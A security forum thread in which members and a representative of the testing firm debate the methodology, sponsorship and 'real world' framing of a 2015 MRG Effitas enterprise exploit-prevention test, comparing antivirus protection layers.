MRG Effitas Real World Enterprise Security Exploit Prevention Test March 2015

Discussion in 'other anti-malware software' started by FleischmannTV, Apr 24, 2015.

  1. ropchain

    ropchain Registered Member

    Joined:
    Mar 26, 2015
    Posts:
    335
    1. I have *never* made any statement about the difficulty of findings vulnerabilities.
    2. My statement was meant to indicate that your statement about the bug bounty and Chrome exploits in the wild is not based on facts and it can't be deduced from any data that the Chromium bug bounty program is preventing ITW 0day's

    Kees, I have to say that you're jumping to conclusions pretty quick in certain situations.
     
  2. First it is not caused by the bug bounty program alone, I agree on that. Have you read about automated testing at Google? How large and well cataloged their reusable set of code and (regression) test sets is? The number of bugs per 1000 lines of code (KLOC) of Google is 1/3 of the industry average and half of their largest competitors (Mircrosoft and Apple).

    Second, all public available data I could find shows that the publishing date of a vulnability has the same date on which Google released a new version which closed that vulnability. Maybe you could point out a Chrome ITW in the last five years?
     
    Last edited by a moderator: Apr 29, 2015
  3. RJK3

    RJK3 Registered Member

    Joined:
    Apr 4, 2011
    Posts:
    862
    I believe there are some valuable insights for anyone who doesn't dismiss the test out of hand for superficial reasons, such as who sponsored it. Not all of the results are as in favour of Kaspersky as one might expect.

    Firstly, I like that they broke down exactly how these solutions prevented infection by layer:
    Anti-Exploit:
    Whether or not people agree with sponsored tests in general, I think it's pretty clear that the anti-exploit module in Kaspersky is quite decent, as the AE only comparison test shows.

    Relying on Anti-Exploit is not ideal:

    I also liked that they addressed the risk of blocking an exploit later in the chain, as malicious shell code can still run and do other functions - something which is increasingly important with the move by exploit kits towards fileless malware. For this reason, relying on exploit protection is not ideal from an information security perspective, even if overall it's still a good way to prevent a persistent infection.

    Exploit protection is critical, but to me late-chain exploit protection is the equivalent of a behaviour blocker when it comes to preventing information leaks. A breach has already been made.

    Script blocking:
    If you prefer the concept of blocking exploits before they run, i.e. by recognising malicious scripts, then this test actually suggests that Symantec and Sophos are well ahead of the other solutions including Kaspersky in this regard. This is the ideal level to be able to block an exploit IMO. It's also easier said than done, due to obfuscation techniques.

    Sophos/Symantec's script blocking in combination with EMET/MBAE/HMPA + Applocker or a software policy would likely be pretty powerful combination.

    Still, given that the script blocking from Kaspersky detected the majority of exploits that evaded URL blocking - I think it would actually be more valuable to see Kaspersky's script blocking layer in isolation than their AE module.

    URL blocking or signature detection are unreliable:
    Trend Micro seem to rely mainly on their URL filtering. While their URL blocking is impressive, unlike Kaspersky they fail in the majority of cases where sites aren't blocked. It would be interesting to see how Trend would perform with the URL blocking component disabled. Similarly McAfee and Microsoft appear to rely mostly on their signature detections, and this is reflected in their overall poor performance.

    Flash main target of exploit kits:
    Lastly it's interesting to note that Adobe Flash exploits appear to be the main browser plugin targeted these days, compared to circa 2012 when it was Java.
     
  4. RJK3

    RJK3 Registered Member

    Joined:
    Apr 4, 2011
    Posts:
    862
    I don't personally know if there are ITW Chrome exploits, but I have seen stats pages from some exploit kits showing a significant number of "loads" for Chrome browser. The question is how valid are these stats, i.e. do they measure what they claim to measure.
     
  5. FleischmannTV

    FleischmannTV Registered Member

    Joined:
    Apr 7, 2013
    Posts:
    1,094
    Location:
    Germany
    Yes, that was very illuminating.

    I think I have to disagree with you there slightly. While the test shows Symantec to be excellent at blocking malicious scripts, one has to account for how they do it technically and the limitations of that approach as well. As far as I know Symantec either detects these scripts on the network level or they inject a monitoring dll in the browser (Firefox).

    The former will probably be ineffective regarding secure connections, which gives reasons for concern in light of the fact that advertising, and malvertising with it, will soon move to secure connections. The latter will probably still work with secure connections, yet I have only observed this particular module in 32-bit Firefox, whereas 64-bit IE and Chrome only have a website blocking toolbar. With Chrome I am not worried, but IE should definitely be covered.
     
  6. RJK3

    RJK3 Registered Member

    Joined:
    Apr 4, 2011
    Posts:
    862
    That's a fair point, and something I'll need to educate myself on.

    I was working on a different assumption, based on how MRG defined script blocking for the test:

    The scenario in which a trusted website is hacked and obfuscated code added is more important to me.

    Personally I'm not worried in the slightest about advertising being used to deliver malware, given how readily available tools and lists for blocking advertising wholesale are - but consider your point made.
     
  7. RJK3

    RJK3 Registered Member

    Joined:
    Apr 4, 2011
    Posts:
    862
  8. ropchain

    ropchain Registered Member

    Joined:
    Mar 26, 2015
    Posts:
    335
    VUPEN? ;)
    http://www.zdnet.com/article/pwn2own-2012-google-chrome-browser-sandbox-first-to-fall/

    Other point:
    How many known Firefox or Safari zero-day's have been used ITW in the past few years?
     
  9. Minimalist

    Minimalist Registered Member

    Joined:
    Jan 6, 2014
    Posts:
    14,881
    Location:
    Slovenia, EU
    Hm, that's good question. I mostly remember reports of IE exploits being used ITW...
     
  10. ropchain

    ropchain Registered Member

    Joined:
    Mar 26, 2015
    Posts:
    335
    Don't forget Flash, Adobe Reader and MS Office ;)
     
  11. RJK3

    RJK3 Registered Member

    Joined:
    Apr 4, 2011
    Posts:
    862
    Pretty sure he's talking in the context of browser specific exploits ITW.
     
  12. Minimalist

    Minimalist Registered Member

    Joined:
    Jan 6, 2014
    Posts:
    14,881
    Location:
    Slovenia, EU
    As I remember there were some Flash and Office exploits used ITW not long ago. But I'm too lazy to find them :)
     
  13. No Pwn2Own is bug bounty, sponsored by Google. Now you are confirming my first post :)
     
  14. TonyW

    TonyW Registered Member

    Joined:
    Oct 12, 2005
    Posts:
    2,741
    Location:
    UK
  15. ropchain

    ropchain Registered Member

    Joined:
    Mar 26, 2015
    Posts:
    335
    Pwn2Own 2012 was different, participants were *not* required to hand over their exploits. ;)
     
  16. Zoltan_MRG

    Zoltan_MRG Registered Member

    Joined:
    Apr 9, 2015
    Posts:
    31

    Some exploit samples targeted Silverlight in Chrome, others Flash in Firefox. Which means running non-IE browser with a vulnerable plugin (Flash, Silverlight) is still a risk.


    No.

    As in all other tests, we and the vendor created the list of products to be tested based on the market share, and the relevance. Please note this is an Enterprise test.
    About the artificial test, we still have not seen a single valid argument why the test is not OK on a technical level. We shared all the details, it is a 100% transparent test. Also every vendor received the code for free, so everyone can improve their product.

    We are a UK based company.
     
  17. Well OK on technical level is a nice self interpretable condition.

    It is not the technical validity, but the validity of the origin that is questionable.
    IMO a testing organisation should not use the (artifiical) tests of a sponsor. But let's agree to disagree on that.

    It is not the technical validity, but the validity of using artificial test and call them real world tests.
    It remains hilareous that the same testing organisation has two (IMO contradicting) qualifications for real world protection tests in regard to anti-exploit testing. Artificial tests supplied by the sponsor on one occasion versus real world exploits found in the wild a few weeks later and both call them real world protection tests.

    It is not the technical validity, but the validity of the success/fail condition that is questionable.
    See comment of security expert
     
    Last edited by a moderator: Apr 30, 2015
  18. As to market share Opswat claims that 2/3 of the data is collected from corporate users and AVAST is listed as second

    As to relevance this is what a security experts comments to your criteria
     
  19. SLE

    SLE Registered Member

    Joined:
    Jun 30, 2011
    Posts:
    361
    Of course such things are hard to test and catch. But at the very first level the "test setting" was: old third party software, disabled windows updates (OS not up to date etc.). I know otherwise it would be hard to test exploits.

    BUT: Even at this point, of course all is artificial and has nothing to do with real world! So why call it real world? Just misleading.
     
  20. ropchain

    ropchain Registered Member

    Joined:
    Mar 26, 2015
    Posts:
    335
    Do you even know how exploits work?
    1. There is no difference between using one-days or zero-days, the only difference is the existence of a patch, that's it.
    2. Testing security solutions against EK's is not 'artificial'.
    3. Almost all exploits use the same techniques that are also used in the one 'artificial' test of HMPA.
    4. Buying multiple zero-day exploits would cost you half a million bucks and in that case MRG Effitas would be criticized by the entire industry for supporting companies like Netragard and Beyond Security.
     
  21. SLE

    SLE Registered Member

    Joined:
    Jun 30, 2011
    Posts:
    361
    I know all of that and I'm with you in that 4 points. Thats why I clearly wrote: otherwise hard to test ;)

    But: why call such a setting real world? It's not necessary to call it so, it's just an exploit test, an approach and far from real world testing. And if it's not real world - it's artifical, like many other tests. That's all - word playing :)

    Beside that: This exploit test is much better than the one MRG did for Surfright.
     
  22. 2. We are not talking about the EK-tests, MRG called the tests of page 35 and onward artificial of HPMA, that is the artificial tests we are talking about. MRG called them artificial, when you disagree start a discussion with Zoltan, not me

    3. Disagree read page 35 and onwards od HMPA test
    In order to generate the correct shellcode, really? Only FireFox due to the lack of a low rights sandbox allows side by side intrusion of medium level IL processes. Still not artificial, then read that the rest of this artificial test scenario is based on an exploit closed in 2011! I rest my :'( and :blink:
     
    Last edited by a moderator: Apr 30, 2015
  23. Zoltan_MRG

    Zoltan_MRG Registered Member

    Joined:
    Apr 9, 2015
    Posts:
    31
    As I am answering to multiple posts, please forgive me not to use the proper "reply"-"quote" method.

    First of all I'm confused. Most of the questions in this thread is about the other report.

    2. Why is the Hitmanpro test called real world test? The whole report is divided into 3 sections. Product assessment, product comparison (real world exploit tests), artificial zero day test. Because we believe the most important part of the whole report is the product comparison test, this is why we named the report after that section. If you can propose a better title for the report, let us know, we are interested.

    3. Artificial zero-day test in the Hitmanpro test: If someone is not interested in the results where the vendor provided the code, that is OK. As you can see, the results are split into two columns. Just cover the column you are not interested in, and look at the report that way. It is important to see that the exploit we wrote internally bypassed all but 2 security products with default settings. (EMET only blocked the attack when it was configured to protect the Firefox browser). And this is pretty bad that people are focusing on why the second test is not valid, rather than demanding that all AV has to include a proactive exploit protection module.

    4. "Executable has to run to generate the correct shellcode ... " (Hitmanpro test) : Already answered multiple times, check the original thread. Also as in the original document it was stated "In a real world scenario, the offset can be leaked first to the attacker, and the attacker can dynamically compile the shellcode based on this information – similar to the Metasploit ms13_037_svg_dashstyle module."

    5. Test with vulnerability patched in 2011: I'm lost, which vulnerability are you referring to? The artificial zero day exploit has nothing to do with any known vulnerabilities at all. Anyway, if you have seen enterprise patch levels, you would know that seeing 10 year unpatched vulnerabilities on the enterprise network is totally common. Java 6 is still common. Old flash player versions which are not upgraded because lack of admin privileges are common. And guess what, IT administrators still love Firefox, so they use it at enterprises. This whole test is almost equal to a new Flash zero day - because we are talking about a plugin running inside a browser.

    6. Why is Avast not included in the Kaspersky (enterprise security) report: Let's analyze the market share link you provided. 2/3 of the protections are corporate users, and 13.2% is the avast! Free antivirus. What do you think, what percentage of the avast! Free antivirus is used at enterprises, which has no enterprise support at all? I don't know it's actual license, but might be it is forbidden to use for business use at all. This is a totally different product market than Kaspersky Enterprise Security. If you are interested in a test where avast! Free is included along with all enterprise products, you have two options: Do it yourself, or pay someone to do it for you. No-one will stop you.

    7. Why is vendor XY included (in the Hitmanpro report) when they don't provide exploit protection? Most products tested don't have a specific anti-exploit module, but still are sold and marketed as a "kick-ass" solution to protect against malicious code. Based on the results, most of these products don't do what they promise. Protecting against the prevalent Angler exploit kit with ever-changing URL's and in-memory malware is almost impossible with traditional AV components. And yes, if the in-memory component drops additional malware for other tasks, it might get blocked, but isn't it too late?

    8. Why is behavior blocking not counted as pass? Already answered, see original thread. Additional information: At an enterprise level, whenever malware is blocked via behavior component (or scheduled scan), an organization who cares about security should do a proper forensic investigation to gather information, what happened between the time the malware started, and the time it was blocked by behavior protection. Even if nothing happened, this could cost a lot, even if we are talking about a single computer. If something bad happened (e.g. data exfiltration), it is definitely a huge problem (and could not considered as "pass"). Most organisations lacks the skill doing a proper forensic analysis, and hiring someone to do that is expensive. I know, because I had this job for years.
     
  24. Is that an opinion or a fact. You make IT-administrators look like incompetent people. What a disappointing libellous answer.

    So to your knowledge "anti-exploit" and "protect against malicious code" is the same? A disappointing answer (especially when you speak so low of IT-admins), I would expected you to have some basic terminology knowledge of the IT-industry.

    So to your knowledge Avast does not have an enterprise solution? A disappointing answer (especially when you speak so low of IT-admins), I would expected you to have some basic market knowledge of the IT-industry.

    Let me use your own answer :argh: You have two options: do the research yourself or pay someone to do it for you.
     
    Last edited by a moderator: May 3, 2015
  25. Well I did a small personal test on this with AVG Linkscanner: see https://www.wilderssecurity.com/threads/anti-exploit-testing.368806/

    Using a database of 2013 still blocked 75% of the exploits in 2015. This is in-line with research published by AV-companies, showing that 60-75% of the exploits used in exploits kits is over two years old. They also said that 90% to 95% of the exploit attacks use a top 20 exploits. Using this findings AV's should be able to protect at least 60 to 75 percent of the exploits.

    This deduction is congruent with the results of your own research (have a look at page 5 of the Kapersky sponsored test. Even Microsoft stopped over half of the exploits, other all scored above 75%. So your claim about impossible to protect with traditional components is counterdicting these findings. Please remind that real life risk = exposure risk x no-protection risk.
     
    Last edited by a moderator: May 2, 2015
  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.